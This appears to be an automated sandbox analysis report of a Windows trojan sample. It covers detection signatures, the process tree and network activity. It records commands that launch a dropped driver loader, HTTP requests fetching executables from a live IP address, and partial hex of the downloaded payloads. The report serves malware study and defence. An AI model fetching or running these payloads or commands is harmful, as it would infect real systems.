Edit tour

Windows Analysis Report
Iyto7FYCJO.exe

Overview

General Information

Sample name:	Iyto7FYCJO.exe renamed because original name is a hash value
Original sample name:	e12627a292cf6a7d32adb932adbd2b3b.exe
Analysis ID:	1538236
MD5:	e12627a292cf6a7d32adb932adbd2b3b
SHA1:	2f6bf97cd38104937b7f47be38a00f0cea9a6f4a
SHA256:	eeca777e359e475f4bf1d137bd60dc0194e9520c0047a388ef28d383dc04250e
Tags:	64exetrojan
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Accesses win32k, likely to find offsets for exploits

Detected VMProtect packer

Drops executables to the windows directory (C:\Windows) and starts them

Found direct / indirect Syscall (likely to bypass EDR)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Sample is not signed and drops a device driver

Tries to detect debuggers (CloseHandle check)

Tries to detect virtualization through RDTSC time measurements

Tries to evade analysis by execution special instruction (VM detection)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

Iyto7FYCJO.exe (PID: 1308 cmdline: "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5: E12627A292CF6A7D32ADB932ADBD2B3B)

conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1892 cmdline: C:\Windows\system32\cmd.exe /c cd C:\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 5260 cmdline: C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

Vulnerability.exe (PID: 5460 cmdline: C:\Windows\Vulnerability.exe C:\Windows\driver.sys MD5: 8619AFEC8BD66B2C589FC987D7D0B194)

conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6128 cmdline: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 | find /i /v "md5" | find /i /v "certutil" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

certutil.exe (PID: 940 cmdline: certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 MD5: F17616EC0522FC5633151F7CAA278CAA)

find.exe (PID: 6656 cmdline: find /i /v "md5" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

find.exe (PID: 5060 cmdline: find /i /v "certutil" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 4092 cmdline: C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7044 cmdline: cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 2284 cmdline: timeout /t 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)

WerFault.exe (PID: 1812 cmdline: C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Code function: 5_2_00007FF7738F3B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,

5_2_00007FF7738F3B60

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:15:02 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 17:41:18 GMTETag: "23800-623960fde9891"Accept-Ranges: bytesContent-Length: 145408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 06 02 00 cc 01 00 00 00 50 02 00 e8 01 00 00 00 40 02 00 30 0f 00 00 00 00 00 00 00 00 00 00 00 60 02 00 08 01 00 00 b0 d7 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 01 00 28 00 00 00 70 d6 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 60 01 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 4c 01 00 00 10 00 00 00 4e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 cb 00 00 00 60 01 00 00 cc 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 0c 00 00 00 30 02 00 00 06 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 30 0f 00 00 00 40 02 00 00 10 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e8 01 00 00 00 50 02 00 00 02 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 01 00 00 00 60 02 00 00 02 00 00 00 36 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:15:03 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 19:27:48 GMTETag: "2a00-623978cbb6377"Accept-Ranges: bytesContent-Length: 10752Keep-Alive: timeout=5, max=99Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 34 f0 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 74 b0 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 24 00 00 00 60 32 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 31 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d2 12 00 00 00 10 00 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 50 06 00 00 00 30 00 00 00 08 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 8c 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 fc 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 04 03 00 00 00 60 00 00 00 04 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 62 2e 72 65 6c 6f 63 00 00 24 00 00 00 00 70 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

IP Address: 172.67.72.57 172.67.72.57

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic	HTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /driver.sys HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122

Source: global traffic	HTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /driver.sys HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: keyauth.win

Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exe
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exeC9?
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exeC:
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exev
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sys
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sysC:
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sysW
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.syse
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sysl
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://keyauth.win/api/1.2/
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://keyauth.win/api/1.2/2(f
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: Iyto7FYCJO.exe, 00000000.00000002.2223557132.00007FF7A27F2000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.behance.net/madetypeFree
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/03

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710

Source: unknown

HTTPS traffic detected: 172.67.72.57:443 -> 192.168.2.5:49710 version: TLS 1.2

Source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E945000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: NtUserGetRawInputData

memstr_6d72b45d-7

System Summary

Detected VMProtect packer

Source: Iyto7FYCJO.exe

Static PE information: .vmp0 and .vmp1 section names

Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E6810 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,VirtualFree,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,memset,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,VirtualFree,		5_2_00007FF7738E6810
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F32C0 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,VirtualFree,_stricmp,VirtualFree,VirtualFree,_invalid_parameter_noinfo_noreturn,		5_2_00007FF7738F32C0

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738E45E0: LoadLibraryA,LoadLibraryA,_dupenv_s,_invalid_parameter_noinfo_noreturn,free,SymFromName,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_time64,GetCurrentThreadId,srand,rand,rand,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,memset,?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z,??7ios_base@std@@QEBA_NXZ,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,CreateFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,SymUnloadModule64,SymCleanup,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

5_2_00007FF7738E45E0

